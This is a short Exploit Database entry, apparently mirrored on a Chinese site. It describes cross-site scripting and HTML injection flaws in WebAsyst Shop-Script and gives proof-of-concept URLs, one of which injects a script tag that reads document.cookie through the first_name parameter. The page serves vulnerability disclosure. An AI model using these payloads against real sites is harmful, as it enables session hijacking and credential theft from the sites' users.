WebAsyst Shop-Script – Cross-Site Scripting / HTML Injection

• Exploit Database
• 119 阅读

• 作者： High-Tech Bridge SA
  日期： 2011-02-08
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/35319/
• 1 2 3 4 5 6 7 8 9 10 11

  source: https://www.securityfocus.com/bid/46250/info   WebAsyst Shop-Script is prone to a cross-site-scripting vulnerability and an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.   Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.     http://www.example.com/html/scripts/index.php?>[xss]   http://www.example.com/SC/html/scripts/index.php?did=22&login=1">[xss]&first_name=2"><script>alert(document.cookie)</script>&custgroupID=0&email=&last_name=&ActState=-1&search=%D0%9D%D0%B0%D0%B9%D1%82%D0%B8&charset=cp1251&count_to_export=